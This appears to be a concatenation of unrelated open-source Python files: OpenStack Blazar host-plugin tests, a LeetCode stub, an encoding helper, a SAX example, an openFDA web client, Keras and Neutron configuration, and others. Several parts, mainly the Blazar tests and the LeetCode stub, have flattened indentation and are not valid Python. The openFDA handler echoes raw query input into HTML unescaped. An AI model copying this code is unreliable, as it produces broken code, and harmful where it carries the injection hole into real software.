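        # Freeze utcnow after the lease start date so _reallocate takes the
        # active-reservation path: the failed host is removed from the
        # aggregate and the replacement host is added.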
with mock.patch.object(datetime, 'datetime',
mock.Mock(wraps=datetime.datetime)) as patched:
patched.utcnow.return_value = datetime.datetime(
2020, 1, 1, 13, 00)
result = self.fake_phys_plugin._reallocate(dummy_allocation)
self.remove_compute_host.assert_called_once_with(
dummy_host_reservation['aggregate_id'],
failed_host['service_name'])
matching_hosts.assert_called_once_with(
dummy_reservation['hypervisor_properties'],
dummy_reservation['resource_properties'],
'1-1', datetime.datetime(2020, 1, 1, 13, 00),
dummy_lease['end_date'])
alloc_update.assert_called_once_with(
dummy_allocation['id'],
{'compute_host_id': new_host['id']})
        self.add_compute_host.assert_called_once_with(
            dummy_host_reservation['aggregate_id'],
            new_host['service_name'])
self.assertEqual(True, result)
def test_reallocate_missing_resources(self):
failed_host = {'id': '1'}
dummy_allocation = {
'id': 'alloc-1',
'compute_host_id': failed_host['id'],
'reservation_id': 'rsrv-1'
}
dummy_reservation = {
'id': 'rsrv-1',
'resource_type': plugin.RESOURCE_TYPE,
'lease_id': 'lease-1',
'status': 'pending',
'hypervisor_properties': [],
'resource_properties': [],
'resource_id': 'resource-1'
}
dummy_host_reservation = {
'aggregate_id': 1
}
dummy_lease = {
'name': 'lease-name',
'start_date': datetime.datetime(2020, 1, 1, 12, 00),
'end_date': datetime.datetime(2020, 1, 2, 12, 00),
'trust_id': 'trust-1'
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = dummy_reservation
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = dummy_host_reservation
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = dummy_lease
matching_hosts = self.patch(host_plugin.PhysicalHostPlugin,
'_matching_hosts')
matching_hosts.return_value = []
alloc_destroy = self.patch(self.db_api, 'host_allocation_destroy')
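        # Freeze utcnow before the lease start; with no matching host available
        # the allocation is expected to be destroyed and _reallocate to return
        # False.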
with mock.patch.object(datetime, 'datetime',
mock.Mock(wraps=datetime.datetime)) as patched:
patched.utcnow.return_value = datetime.datetime(
2020, 1, 1, 11, 00)
result = self.fake_phys_plugin._reallocate(dummy_allocation)
matching_hosts.assert_called_once_with(
dummy_reservation['hypervisor_properties'],
dummy_reservation['resource_properties'],
'1-1', dummy_lease['start_date'], dummy_lease['end_date'])
alloc_destroy.assert_called_once_with(dummy_allocation['id'])
self.assertEqual(False, result)
def test_matching_hosts_not_allocated_hosts(self):
def host_allocation_get_all_by_values(**kwargs):
if kwargs['compute_host_id'] == 'host1':
return True
host_get = self.patch(
self.db_api,
'reservable_host_get_all_by_queries')
host_get.return_value = [
{'id': 'host1'},
{'id': 'host2'},
{'id': 'host3'},
]
host_get = self.patch(
self.db_api,
'host_allocation_get_all_by_values')
host_get.side_effect = host_allocation_get_all_by_values
host_get = self.patch(
self.db_utils,
'get_free_periods')
host_get.return_value = [
(datetime.datetime(2013, 12, 19, 20, 00),
datetime.datetime(2013, 12, 19, 21, 00)),
]
result = self.fake_phys_plugin._matching_hosts(
'[]', '[]', '1-3',
datetime.datetime(2013, 12, 19, 20, 00),
datetime.datetime(2013, 12, 19, 21, 00))
self.assertEqual(['host2', 'host3'], result)
def test_matching_hosts_allocated_hosts(self):
def host_allocation_get_all_by_values(**kwargs):
if kwargs['compute_host_id'] == 'host1':
return True
host_get = self.patch(
self.db_api,
'reservable_host_get_all_by_queries')
host_get.return_value = [
{'id': 'host1'},
{'id': 'host2'},
{'id': 'host3'},
]
host_get = self.patch(
self.db_api,
'host_allocation_get_all_by_values')
host_get.side_effect = host_allocation_get_all_by_values
host_get = self.patch(
self.db_utils,
'get_free_periods')
host_get.return_value = [
(datetime.datetime(2013, 12, 19, 20, 00),
datetime.datetime(2013, 12, 19, 21, 00)),
]
result = self.fake_phys_plugin._matching_hosts(
'[]', '[]', '3-3',
datetime.datetime(2013, 12, 19, 20, 00),
datetime.datetime(2013, 12, 19, 21, 00))
self.assertEqual(['host1', 'host2', 'host3'], result)
def test_matching_hosts_allocated_hosts_with_cleaning_time(self):
def host_allocation_get_all_by_values(**kwargs):
if kwargs['compute_host_id'] == 'host1':
return True
self.cfg.CONF.set_override('cleaning_time', '5')
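        # With a 5-minute cleaning time, a host only matches if it is free for
        # the reservation window padded by 5 minutes on each side.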
host_get = self.patch(
self.db_api,
'reservable_host_get_all_by_queries')
host_get.return_value = [
{'id': 'host1'},
{'id': 'host2'},
{'id': 'host3'},
]
host_get = self.patch(
self.db_api,
'host_allocation_get_all_by_values')
host_get.side_effect = host_allocation_get_all_by_values
host_get = self.patch(
self.db_utils,
'get_free_periods')
host_get.return_value = [
(datetime.datetime(2013, 12, 19, 20, 00)
- datetime.timedelta(minutes=5),
datetime.datetime(2013, 12, 19, 21, 00)
+ datetime.timedelta(minutes=5))
]
result = self.fake_phys_plugin._matching_hosts(
'[]', '[]', '3-3',
datetime.datetime(2013, 12, 19, 20, 00),
datetime.datetime(2013, 12, 19, 21, 00))
self.assertEqual(['host1', 'host2', 'host3'], result)
def test_matching_hosts_not_matching(self):
host_get = self.patch(
self.db_api,
'reservable_host_get_all_by_queries')
host_get.return_value = []
result = self.fake_phys_plugin._matching_hosts(
'["=", "$memory_mb", "2048"]', '[]', '1-1',
datetime.datetime(2013, 12, 19, 20, 00),
datetime.datetime(2013, 12, 19, 21, 00))
self.assertEqual([], result)
def test_check_params_with_valid_before_end(self):
values = {
'min': 1,
'max': 2,
'resource_properties': '',
'hypervisor_properties': '',
'before_end': 'snapshot'
}
self.fake_phys_plugin._check_params(values)
self.assertEqual(values['before_end'], 'snapshot')
def test_check_params_with_invalid_before_end(self):
values = {
'min': 1,
'max': 2,
'resource_properties': '',
'hypervisor_properties': '',
'before_end': 'invalid'
}
self.assertRaises(manager_exceptions.MalformedParameter,
self.fake_phys_plugin._check_params,
values)
def test_check_params_without_before_end(self):
self.cfg.CONF.set_override('before_end', '',
group='physical:host')
values = {
'min': 1,
'max': 2,
'resource_properties': '',
'hypervisor_properties': ''
}
self.fake_phys_plugin._check_params(values)
self.assertEqual(values['before_end'], 'default')
class PhysicalHostMonitorPluginTestCase(tests.TestCase):
def setUp(self):
super(PhysicalHostMonitorPluginTestCase, self).setUp()
self.patch(nova_client, 'Client')
self.host_monitor_plugin = host_plugin.PhysicalHostMonitorPlugin()
def test_configuration(self):
# reset the singleton at first
host_plugin.PhysicalHostMonitorPlugin._instance = None
self.cfg = self.useFixture(conf_fixture.Config(CONF))
self.cfg.config(os_admin_username='fake-user')
self.cfg.config(os_admin_password='fake-passwd')
self.cfg.config(os_admin_user_domain_name='fake-user-domain')
self.cfg.config(os_admin_project_name='fake-pj-name')
self.cfg.config(os_admin_project_domain_name='fake-pj-domain')
self.host_monitor_plugin = host_plugin.PhysicalHostMonitorPlugin()
self.assertEqual('fake-user', self.host_monitor_plugin.username)
self.assertEqual("fake-passwd", self.host_monitor_plugin.password)
self.assertEqual("fake-user-domain",
self.host_monitor_plugin.user_domain_name)
self.assertEqual("fake-pj-name", self.host_monitor_plugin.project_name)
self.assertEqual("fake-pj-domain",
self.host_monitor_plugin.project_domain_name)
def test_notification_callback_disabled_true(self):
failed_host = {'hypervisor_hostname': 'hypvsr1'}
event_type = 'service.update'
payload = {
'nova_object.namespace': 'nova',
'nova_object.name': 'ServiceStatusPayload',
'nova_object.version': '1.1',
'nova_object.data': {
'host': failed_host['hypervisor_hostname'],
'disabled': True,
'last_seen_up': '2012-10-29T13:42:05Z',
'binary': 'nova-compute',
'topic': 'compute',
'disabled_reason': None,
'report_count': 1,
'forced_down': False,
'version': 22,
'availability_zone': None,
'uuid': 'fa69c544-906b-4a6a-a9c6-c1f7a8078c73'
}
}
host_get_all = self.patch(db_api,
'reservable_host_get_all_by_queries')
host_get_all.return_value = [failed_host]
handle_failures = self.patch(self.host_monitor_plugin,
'_handle_failures')
handle_failures.return_value = {'rsrv-1': {'missing_resources': True}}
result = self.host_monitor_plugin.notification_callback(event_type,
payload)
host_get_all.assert_called_once_with(
['hypervisor_hostname == ' + payload['nova_object.data']['host']])
self.assertEqual({'rsrv-1': {'missing_resources': True}}, result)
def test_notification_callback_no_failure(self):
event_type = 'service.update'
payload = {
'nova_object.namespace': 'nova',
'nova_object.name': 'ServiceStatusPayload',
'nova_object.version': '1.1',
'nova_object.data': {
'host': 'compute-1',
'disabled': False,
'last_seen_up': '2012-10-29T13:42:05Z',
'binary': 'nova-compute',
'topic': 'compute',
'disabled_reason': None,
'report_count': 1,
'forced_down': False,
'version': 22,
'availability_zone': None,
'uuid': 'fa69c544-906b-4a6a-a9c6-c1f7a8078c73'
}
}
host_get_all = self.patch(db_api, 'host_get_all_by_queries')
host_get_all.return_value = []
handle_failures = self.patch(self.host_monitor_plugin,
'_handle_failures')
result = self.host_monitor_plugin.notification_callback(event_type,
payload)
host_get_all.assert_called_once_with(
['reservable == 0',
'hypervisor_hostname == ' + payload['nova_object.data']['host']])
handle_failures.assert_not_called()
self.assertEqual({}, result)
def test_notification_callback_recover(self):
recovered_host = {'hypervisor_hostname': 'hypvsr1', 'id': 1}
event_type = 'service.update'
payload = {
'nova_object.namespace': 'nova',
'nova_object.name': 'ServiceStatusPayload',
'nova_object.version': '1.1',
'nova_object.data': {
'host': 'compute-1',
'disabled': False,
'last_seen_up': '2012-10-29T13:42:05Z',
'binary': 'nova-compute',
'topic': 'compute',
'disabled_reason': None,
'report_count': 1,
'forced_down': False,
'version': 22,
'availability_zone': None,
'uuid': 'fa69c544-906b-4a6a-a9c6-c1f7a8078c73'
}
}
host_get_all = self.patch(db_api, 'host_get_all_by_queries')
host_get_all.return_value = [recovered_host]
handle_failures = self.patch(self.host_monitor_plugin,
'_handle_failures')
host_update = self.patch(db_api, 'host_update')
result = self.host_monitor_plugin.notification_callback(event_type,
payload)
host_get_all.assert_called_once_with(
['reservable == 0',
'hypervisor_hostname == ' + payload['nova_object.data']['host']])
host_update.assert_called_once_with(recovered_host['id'],
{'reservable': True})
handle_failures.assert_not_called()
self.assertEqual({}, result)
def test_poll_resource_failures_state_down(self):
hosts = [
{'id': '1',
'hypervisor_hostname': 'hypvsr1',
'reservable': True},
{'id': '2',
'hypervisor_hostname': 'hypvsr2',
'reservable': True},
]
host_get_all = self.patch(db_api,
'host_get_all_by_filters')
host_get_all.return_value = hosts
hypervisors_list = self.patch(
self.host_monitor_plugin.nova.hypervisors, 'list')
hypervisors_list.return_value = [
mock.MagicMock(id=1, state='down', status='enabled'),
mock.MagicMock(id=2, state='down', status='enabled')]
result = self.host_monitor_plugin._poll_resource_failures()
self.assertEqual((hosts, []), result)
def test_poll_resource_failures_status_disabled(self):
hosts = [
{'id': '1',
'hypervisor_hostname': 'hypvsr1',
'reservable': True},
{'id': '2',
'hypervisor_hostname': 'hypvsr2',
'reservable': True},
]
host_get_all = self.patch(db_api,
'host_get_all_by_filters')
host_get_all.return_value = hosts
hypervisors_list = self.patch(
self.host_monitor_plugin.nova.hypervisors, 'list')
hypervisors_list.return_value = [
mock.MagicMock(id=1, state='up', status='disabled'),
mock.MagicMock(id=2, state='up', status='disabled')]
result = self.host_monitor_plugin._poll_resource_failures()
self.assertEqual((hosts, []), result)
def test_poll_resource_failures_nothing(self):
hosts = [
{'id': '1',
'hypervisor_hostname': 'hypvsr1',
'reservable': True},
{'id': '2',
'hypervisor_hostname': 'hypvsr2',
'reservable': True},
]
host_get_all = self.patch(db_api,
'host_get_all_by_filters')
host_get_all.return_value = hosts
hypervisors_list = self.patch(
self.host_monitor_plugin.nova.hypervisors, 'list')
hypervisors_list.return_value = [
mock.MagicMock(id=1, state='up', status='enabled'),
mock.MagicMock(id=2, state='up', status='enabled')]
result = self.host_monitor_plugin._poll_resource_failures()
self.assertEqual(([], []), result)
def test_poll_resource_failures_recover(self):
hosts = [
{'id': '1',
'hypervisor_hostname': 'hypvsr1',
'reservable': False},
{'id': '2',
'hypervisor_hostname': 'hypvsr2',
'reservable': False},
]
host_get_all = self.patch(db_api,
'host_get_all_by_filters')
host_get_all.return_value = hosts
hypervisors_list = self.patch(
self.host_monitor_plugin.nova.hypervisors, 'list')
hypervisors_list.return_value = [
mock.MagicMock(id=1, state='up', status='enabled'),
mock.MagicMock(id=2, state='up', status='enabled')]
result = self.host_monitor_plugin._poll_resource_failures()
self.assertEqual(([], hosts), result)
def test_handle_failures(self):
failed_hosts = [
{'id': '1',
'hypervisor_hostname': 'hypvsr1'}
]
host_update = self.patch(db_api, 'host_update')
heal = self.patch(self.host_monitor_plugin, 'heal')
self.host_monitor_plugin._handle_failures(failed_hosts)
host_update.assert_called_once_with(failed_hosts[0]['id'],
{'reservable': False})
heal.assert_called_once()
def test_heal(self):
failed_hosts = [
{'id': '1',
'hypervisor_hostname': 'hypvsr1'}
]
reservation_flags = {
'rsrv-1': {'missing_resources': True}
}
hosts_get = self.patch(db_api, 'unreservable_host_get_all_by_queries')
hosts_get.return_value = failed_hosts
get_healing_interval = self.patch(self.host_monitor_plugin,
'get_healing_interval')
get_healing_interval.return_value = 60
healing_handler = mock.Mock()
healing_handler.return_value = reservation_flags
self.host_monitor_plugin.healing_handlers = [healing_handler]
start_date = datetime.datetime(2020, 1, 1, 12, 00)
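        # Freeze utcnow so the healing window passed to the handler is exactly
        # start_date .. start_date + healing interval (60 minutes).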
with mock.patch.object(datetime, 'datetime',
mock.Mock(wraps=datetime.datetime)) as patched:
patched.utcnow.return_value = start_date
result = self.host_monitor_plugin.heal()
healing_handler.assert_called_once_with(
failed_hosts, start_date,
start_date + datetime.timedelta(minutes=60)
)
self.assertEqual(reservation_flags, result)
| stackforge/blazar | blazar/tests/plugins/oshosts/test_physical_host_plugin.py | Python | apache-2.0 | 103,122 |
__source__ = 'https://leetcode.com/problems/equal-tree-partition/discuss/'
# Time: O()
# Space: O()
#
# Description: Leetcode # 663. Equal Tree Partition
#
# Given a binary tree with n nodes,
# your task is to check if it's possible to partition the tree to two trees
# which have the equal sum of values after removing exactly one edge on the original tree.
#
# Example 1:
# Input:
# 5
# / \
# 10 10
# / \
# 2 3
#
# Output: True
# Explanation:
# 5
# /
# 10
#
# Sum: 15
#
# 10
# / \
# 2 3
#
# Sum: 15
# Example 2:
# Input:
# 1
# / \
# 2 10
# / \
# 2 20
#
# Output: False
# Explanation: You can't split the tree into two trees with equal sum after removing exactly one edge on the tree.
# Note:
# The range of tree node value is in the range of [-100000, 100000].
# 1 <= n <= 10000
#
# Companies
# Amazon
# Related Topics
# Tree
#
import unittest
class Solution(object):
pass # your function here
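# A minimal sketch of one possible approach (not part of the original
# placeholder above): record the sum of every proper subtree, then check
# whether half of the total appears among those cuts. It assumes the usual
# LeetCode TreeNode with val/left/right attributes; the class name below is
# illustrative only.
class SolutionSketch(object):
    def checkEqualTree(self, root):
        cuts = []
        def subtree_sum(node):
            if node is None:
                return 0
            s = node.val + subtree_sum(node.left) + subtree_sum(node.right)
            cuts.append(s)
            return s
        total = subtree_sum(root)
        cuts.pop()  # the whole tree itself is not a valid cut
        if total == 0:
            return 0 in cuts
        return total % 2 == 0 and total // 2 in cuts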
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
Java = '''
# Thought: https://leetcode.com/problems/equal-tree-partition/solution/
/**
* Definition for a binary tree node.
* public class TreeNode {
* int val;
* TreeNode left;
* TreeNode right;
* TreeNode(int x) { val = x; }
* }
*/
# 7ms 98.08%
class Solution {
int judge=0;
public boolean checkEqualTree(TreeNode root) {
if(root==null)
return false;
int s=sum(root);
if(s%2!=0)
return false;
check(root.left,s/2);
check(root.right,s/2);
if(judge==1)
return true;
return false;
}
private int sum(TreeNode root){
if(root==null)
return 0;
return root.val+sum(root.left)+sum(root.right);
}
private int check(TreeNode root,int half){
if(root==null)
return 0;
int s=root.val+check(root.left,half)+check(root.right,half);
if(s==half)
judge=1;
return s;
}
}
# hash map
# 14ms 31.49%
class Solution {
public boolean checkEqualTree(TreeNode root) {
Map<Integer, Integer> map = new HashMap<Integer, Integer>();
int sum = getsum(root, map);
if(sum == 0)return map.getOrDefault(sum, 0) > 1;
return sum%2 == 0 && map.containsKey(sum/2);
}
public int getsum(TreeNode root, Map<Integer, Integer> map ){
if(root == null)return 0;
int cur = root.val + getsum(root.left, map) + getsum(root.right, map);
map.put(cur, map.getOrDefault(cur,0) + 1);
return cur;
}
}
''' | JulyKikuAkita/PythonPrac | cs15211/EqualTreePartition.py | Python | apache-2.0 | 2,676 |
import sys
class Encoding(object):
@staticmethod
def normalize(value):
"""
Normalize value
:param value: The value
:return: The processed value
"""
# Python 2 vs Python 3
if sys.version_info < (3, 0):
return Encoding.to_ascii(value)
else:
return Encoding.to_unicode(value)
@staticmethod
def to_ascii(value):
"""
To ascii
:param value: The value
:return: The processed value
"""
# Dict
if isinstance(value, dict):
processed_value = {}
for key in value:
if Encoding._is_unicode(key):
processed_key = key.encode('ascii')
else:
processed_key = key
processed_value[processed_key] = Encoding.to_ascii(value[key])
# List
elif isinstance(value, list):
            processed_value = []
            for item in value:
                processed_value.append(Encoding.to_ascii(item))
# Unicode
elif Encoding._is_unicode(value):
processed_value = value.encode('ascii')
else:
processed_value = value
return processed_value
@staticmethod
def to_unicode(value):
"""
To unicode
:param value: The value
:return: The processed value
"""
# Dict
if isinstance(value, dict):
processed_value = {}
for key in value:
if Encoding._is_ascii(key):
processed_key = key.decode('utf-8')
else:
processed_key = key
processed_value[processed_key] = Encoding.to_unicode(value[key])
# List
elif isinstance(value, list):
            processed_value = []
            for item in value:
                processed_value.append(Encoding.to_unicode(item))
        # Ascii
elif Encoding._is_ascii(value):
processed_value = value.decode('utf-8')
else:
processed_value = value
return processed_value
@staticmethod
def _is_ascii(value):
"""
Check if ascii
:param value: The value
:return: Ascii or not
"""
# Python 2 vs Python 3
if sys.version_info < (3, 0):
return isinstance(value, str)
else:
return isinstance(value, bytes)
@staticmethod
def _is_unicode(value):
"""
Check if unicode
:param value: The value
        :return: Unicode or not
"""
# Python 2 vs Python 3
if sys.version_info < (3, 0):
return isinstance(value, unicode)
else:
return isinstance(value, str)
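# Illustrative usage (not part of the original module): normalize() returns
# text strings on Python 3 and ASCII byte strings on Python 2.
if __name__ == '__main__':
    sample = {u'key': u'value', u'items': [u'a', u'b']}
    print(Encoding.normalize(sample))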
| LowieHuyghe/script-core | scriptcore/encoding/encoding.py | Python | apache-2.0 | 2,861 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from xml.parsers.expat import ParserCreate
class DefaultSaxHandler(object):
def start_element(self, name, attrs):
print('sax:start_element: %s, attrs: %s' % (name, str(attrs)))
def end_element(self, name):
print('sax:end_element: %s' % name)
def char_data(self, text):
print('sax:char_data: %s' % text)
xml = r'''<?xml version="1.0"?>
<ol>
<li><a href="/python">Python</a></li>
<li><a href="/ruby">Ruby</a></li>
</ol>
'''
handler = DefaultSaxHandler()
parser = ParserCreate()
parser.StartElementHandler = handler.start_element
parser.EndElementHandler = handler.end_element
parser.CharacterDataHandler = handler.char_data
parser.Parse(xml)
| whyDK37/py_bootstrap | samples/commonlib/use_sax.py | Python | apache-2.0 | 739 |
# Copyright [2017] [name of copyright owner]
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and limitations under the License.
# Author : Álvaro Román Royo ([email protected])
import http.server
import http.client
import json
import socketserver
class testHTTPRequestHandler(http.server.BaseHTTPRequestHandler):
OPENFDA_API_URL = "api.fda.gov"
OPENFDA_API_EVENT = "/drug/event.json"
OPENFDA_API_LYRICA = '?search=patient.drug.medicinalproduct:"LYRICA"&limit=10'
def get_main_page(self):
html = '''
<html>
<head>
<title>OpenFDA app</title>
</head>
<body>
<h1>OpenFDA Client</h1>
<form method='get' action='receivedrug'>
<input type='submit' value='Enviar a OpenFDA'>
</input>
</form>
<form method='get' action='searchmed'>
<input type='text' name='drug'></input>
<input type='submit' value='Buscar Medicamento'></input>
</form>
<form method='get' action='receivecompany'>
<input type='submit' value='Find companies'></input>
</form>
<form method='get' action='searchcom'>
<input type='text' name='drug'></input>
<input type='submit' value='Buscar medicinalproduct'></input>
</form>
</body>
</html>
'''
return html
def get_med(self,drug):
conn = http.client.HTTPSConnection(self.OPENFDA_API_URL)
conn.request("GET", self.OPENFDA_API_EVENT + '?search=patient.drug.medicinalproduct:'+drug+'&limit=10')
r1 = conn.getresponse()
print(r1.status, r1.reason)
data1 = r1.read()
data = data1.decode('utf8')
events = json.loads(data)
#event = events['results'][0]['patient']['drug']
return events
def get_medicinalproduct(self,com_num):
conn = http.client.HTTPSConnection(self.OPENFDA_API_URL)
conn.request("GET", self.OPENFDA_API_EVENT + '?search=companynumb:'+com_num+'&limit=10')
r1 = conn.getresponse()
print(r1.status, r1.reason)
data1 = r1.read()
data = data1.decode('utf8')
events = json.loads(data)
return events
def get_event(self):
conn = http.client.HTTPSConnection(self.OPENFDA_API_URL)
conn.request("GET", self.OPENFDA_API_EVENT + '?limit=10')
r1 = conn.getresponse()
print(r1.status, r1.reason)
data1 = r1.read()
data = data1.decode('utf8')
events = json.loads(data)
#event = events['results'][0]['patient']['drug']
return events
def get_drug(self, events):
medicamentos=[]
for event in events['results']:
medicamentos+=[event['patient']['drug'][0]['medicinalproduct']]
return medicamentos
def get_com_num(self, events):
com_num=[]
for event in events['results']:
com_num+=[event['companynumb']]
return com_num
def drug_page(self,medicamentos):
s=''
for drug in medicamentos:
s += "<li>"+drug+"</li>"
html='''
<html>
<head></head>
<body>
<ul>
%s
</ul>
</body>
</html>''' %(s)
return html
def do_GET(self):
print (self.path)
#print (self.path)
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
        if self.path == '/':
html = self.get_main_page()
self.wfile.write(bytes(html,'utf8'))
elif self.path == '/receivedrug?':
events = self.get_event()
medicamentos = self.get_drug(events)
html = self.drug_page(medicamentos)
self.wfile.write(bytes(html,'utf8'))
elif self.path == '/receivecompany?':
events = self.get_event()
com_num = self.get_com_num(events)
html = self.drug_page(com_num)
self.wfile.write(bytes(html,'utf8'))
elif 'searchmed' in self.path:
drug=self.path.split('=')[1]
print (drug)
events = self.get_med(drug)
com_num = self.get_com_num(events)
html = self.drug_page(com_num)
self.wfile.write(bytes(html,'utf8'))
elif 'searchcom' in self.path:
com_num = self.path.split('=')[1]
print (com_num)
events = self.get_medicinalproduct(com_num)
medicinalproduct = self.get_drug(events)
html = self.drug_page(medicinalproduct)
self.wfile.write(bytes(html,'utf8'))
return
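# socketserver is imported above but never used; a minimal launcher such as the
# one below is assumed to complete the app (port 8000 is an arbitrary choice,
# not taken from the original file).
if __name__ == '__main__':
    PORT = 8000
    httpd = socketserver.TCPServer(("", PORT), testHTTPRequestHandler)
    print("Serving OpenFDA client at port", PORT)
    httpd.serve_forever()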
| varoroyo/Alvaro-Roman | web.py | Python | apache-2.0 | 5,333 |
import psutil
from ajenti.api import *
from ajenti.ui import *
@plugin
class NetworkManager (BasePlugin):
def get_devices(self):
return psutil.net_io_counters(pernic=True).keys()
@interface
class INetworkConfig (object):
interfaces = {}
@property
def interface_list(self):
return self.interfaces.values()
def rescan(self):
pass
def save(self):
pass
@interface
class INetworkConfigBit (object):
def apply(self):
pass
@plugin
class NetworkConfigBit (UIElement, INetworkConfigBit):
cls = 'unknown'
iface = None
title = 'Unknown'
typeid = 'box'
class NetworkInterface(object):
def __init__(self):
self.up = False
self.auto = False
self.name = ''
self.devclass = ''
self.addressing = 'static'
self.bits = []
self.params = {'address': '0.0.0.0'}
self.type = ''
self.editable = True
def __getitem__(self, idx):
if idx in self.params:
return self.params[idx]
else:
return ''
def __setitem__(self, idx, val):
self.params[idx] = val
def add_bits(self, ui):
for cls in INetworkConfigBit.get_classes():
if cls.cls in self.bit_classes:
b = cls.new(ui)
b.iface = self
b.refresh()
self.bits.append(b)
| lupyuen/RaspberryPiImage | usr/share/pyshared/ajenti/plugins/network/api.py | Python | apache-2.0 | 1,407 |
from keras import backend as K
class Config:
def __init__(self):
self.verbose = True
self.network = 'resnet50'
# setting for data augmentation
self.use_horizontal_flips = True
self.use_vertical_flips = True
self.rot_90 = True
# anchor box scales
		self.anchor_box_scales = [1, 2, 4, 8, 16, 32, 64, 128, 256, 512]
# anchor box ratios
		self.anchor_box_ratios = [[1, 1], [1, 2], [2, 1], [1, 3], [3, 1], [4, 1], [1, 4], [1, 5], [5, 1], [1, 6], [6, 1], [1, 7], [7, 1], [1, 8], [8, 1], [1, 9], [9, 1]]
# size to resize the smallest side of the image
self.im_size = 600
# image channel-wise mean to subtract
self.img_channel_mean = [103.939, 116.779, 123.68]
self.img_scaling_factor = 1.0
# number of ROIs at once
self.num_rois = 8
# stride at the RPN (this depends on the network configuration)
self.rpn_stride = 16
self.balanced_classes = False
# scaling the stdev
self.std_scaling = 4.0
self.classifier_regr_std = [8.0, 8.0, 4.0, 4.0]
# overlaps for RPN
self.rpn_min_overlap = 0.3
self.rpn_max_overlap = 0.7
# overlaps for classifier ROIs
self.classifier_min_overlap = 0.1
self.classifier_max_overlap = 0.5
# placeholder for the class mapping, automatically generated by the parser
self.class_mapping = None
#location of pretrained weights for the base network
# weight files can be found at:
# https://github.com/fchollet/deep-learning-models/releases/download/v0.2/resnet50_weights_th_dim_ordering_th_kernels_notop.h5
# https://github.com/fchollet/deep-learning-models/releases/download/v0.2/resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5
self.model_path = 'model_frcnn.vgg.hdf5'
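# Illustrative usage (not part of the original file): training scripts are
# assumed to instantiate Config and override fields before building the model.
if __name__ == '__main__':
    c = Config()
    c.num_rois = 32  # hypothetical override
    print(c.anchor_box_scales, c.rpn_stride)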
| yhalk/vw_challenge_ECR | src/jetson/keras_frcnn/config.py | Python | apache-2.0 | 1,646 |
# -*- coding: utf-8 -*-
"""Class representing the mapper for the parser init files."""
from plasoscaffolder.bll.mappings import base_mapping_helper
from plasoscaffolder.bll.mappings import base_sqliteplugin_mapping
from plasoscaffolder.model import init_data_model
class ParserInitMapping(
base_sqliteplugin_mapping.BaseSQLitePluginMapper):
"""Class representing the parser mapper."""
_PARSER_INIT_TEMPLATE = 'parser_init_template.jinja2'
def __init__(self, mapping_helper: base_mapping_helper.BaseMappingHelper):
"""Initializing the init mapper class.
Args:
mapping_helper (base_mapping_helper.BaseMappingHelper): the helper class
for the mapping
"""
super().__init__()
self._helper = mapping_helper
def GetRenderedTemplate(
self,
data: init_data_model.InitDataModel) -> str:
"""Retrieves the parser init file.
Args:
data (init_data_model.InitDataModel): the data for init file
Returns:
str: the rendered template
"""
context = {'plugin_name': data.plugin_name,
'is_create_template': data.is_create_template}
rendered = self._helper.RenderTemplate(
self._PARSER_INIT_TEMPLATE, context)
return rendered
| ClaudiaSaxer/PlasoScaffolder | src/plasoscaffolder/bll/mappings/parser_init_mapping.py | Python | apache-2.0 | 1,234 |
"""Python Library Boilerplate contains all the boilerplate you need to create a Python package."""
__author__ = 'Michael Joseph'
__email__ = '[email protected]'
__url__ = 'https://github.com/michaeljoseph/sealeyes'
__version__ = '0.0.1'
def sealeyes():
return 'Hello World!'
| michaeljoseph/sealeyes | sealeyes/__init__.py | Python | apache-2.0 | 288 |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# String literals representing core resources.
ADDRESS_GROUP = 'address_group'
AGENT = 'agent'
FLOATING_IP = 'floatingip'
LOCAL_IP_ASSOCIATION = 'local_ip_association'
NETWORK = 'network'
NETWORKS = 'networks'
PORT = 'port'
PORTS = 'ports'
PORT_BINDING = 'port_binding'
PORT_DEVICE = 'port_device'
PROCESS = 'process'
RBAC_POLICY = 'rbac-policy'
ROUTER = 'router'
ROUTER_CONTROLLER = 'router_controller'
ROUTER_GATEWAY = 'router_gateway'
ROUTER_INTERFACE = 'router_interface'
SECURITY_GROUP = 'security_group'
SECURITY_GROUP_RULE = 'security_group_rule'
SEGMENT = 'segment'
SEGMENT_HOST_MAPPING = 'segment_host_mapping'
SUBNET = 'subnet'
SUBNETS = 'subnets'
SUBNETPOOL_ADDRESS_SCOPE = 'subnetpool_address_scope'
SUBPORTS = 'subports'
TRUNK = 'trunk'
TRUNK_PLUGIN = 'trunk_plugin'
| openstack/neutron-lib | neutron_lib/callbacks/resources.py | Python | apache-2.0 | 1,353 |
#!/usr/bin/env python
# Copyright 2017 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import os
from pprint import pprint as pp
from f5_cccl.resource.ltm.pool import *
from mock import MagicMock
import pytest
bigip_pools_cfg = [
{'description': None,
'partition': 'Common',
'loadBalancingMode': 'round-robin',
'monitor': '/Common/http ',
'membersReference': {
'isSubcollection': True,
'items': [
{'ratio': 1,
'name': '172.16.0.100:8080',
'partition': 'Common',
'session': 'monitor-enabled',
'priorityGroup': 0,
'connectionLimit': 0,
